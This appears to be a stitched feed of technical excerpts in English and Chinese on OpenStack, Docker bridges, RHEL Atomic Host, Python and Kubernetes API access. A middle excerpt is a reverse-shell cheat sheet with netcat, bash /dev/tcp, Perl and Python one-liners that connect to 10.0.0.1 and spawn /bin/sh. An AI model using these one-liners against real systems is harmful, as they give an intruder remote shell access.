Shanghai,
CN-31
Add network management for native docker https://blueprints.launchpad.net/magnum/+spec/native-docker-network
https://etherpad.openstack.org/p/magnum-native-docker-network
A while back, I wrote an article about taking consistent snapshots of your virtual machines in your OpenStack environment. However this method was really intrusive since it required to be inside the virtual machine and to manually summon a filesystem freeze. In this article, I will use a different approach to achieve the same goal without the need to be inside the virtual machine.
The only requirement is to have a virtual machine running the qemu-guest-agent.
... ➦已经融资9500万美元的Pluribus公司,做得Server Switch产品,其CEO说,既能克服Vmware产品的scalability, invisibility, performance问题,又能克服Cisco ACI的系统封闭性。说白了就是把网络做在服务器里面,但是网络处理发生在交换芯片而不是CPU里面,跟Facebook Wedge一样 @盛科张卫峰
__file__仅在文件中运行的时候才正常,而在交互式命令行中则需要使用变通的方法:
import os
import inspect
import sys
if not hasattr(sys.modules[__name__], '__file__'):
__file__ = inspect.getfile(inspect.currentframe())
print os.path.dirname(os.path.abspath(__file__))
Red Hat has announced first public beta of Red Hat Enterprise Linux 7 Atomic Host. The beta is available from Red Hat and on Amazon Web Services and Google Compute Platform.
What can you expect from the Red Hat Enterprise Linux 7 Atomic Host Beta?
Red Hat Enterprise Linux 7 Atomic Host Beta provides a streamlined host platform that is optimized to run application containers. The software components included in Red Hat Enterprise Linux 7 Atomic Host Beta, as well as the default system tunings, have been designed to enhance the performance, scalability and security of containers, giving you the optimal platform on which to deploy and run application containers.
... ➦nc -l -p 8080 -vvv
Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Here’s a shorter, feature-free version of the perl-reverse-shell:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
There’s also an alternative PERL revere shell here.
This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…
... ➦首先修改Docker的默认网桥:
#停止Docker Daemon进程
systemctl stop docker
#设置默认网桥docker0为down,并删除
ip link set dev docker0 down
brctl delbr docker0
#新建Linux网桥localbr0
brctl addbr localbr0
#在每台主机上更改10.10.x.0/24,注意各台主机之间不要重复
ip addr add 10.10.2.1/24 dev localbr0
ip link set dev localbr0 up
echo 'OPTIONS="--bridge localbr0 --iptables=false"'>>/etc/sysconfig/docker
systemctl start Docker
为上述网桥添加GRE连接
... ➦You can enable kubernetes authentication by through this documentation. Then you happily access kube-apiserve by curl:
# curl -k -N -X GET -H "Authorization: Basic XXXXXXXXXX" http://localhost:8080/api/v1/namespaces/default/pods
{
"kind": "PodList",
"apiVersion": "v1",
"metadata": {
"selfLink": "/api/v1/namespaces/default/pods",
"resourceVersion": "74034"
},
"items": []
}
Nothing blocks this request! What is wrong? Wait a moment and checkout kubernetes documentation, I find this:
... ➦The Kubernetes API is served by the Kubernetes apiserver process. Typically, there is one of these running on a single kubernetes-master node.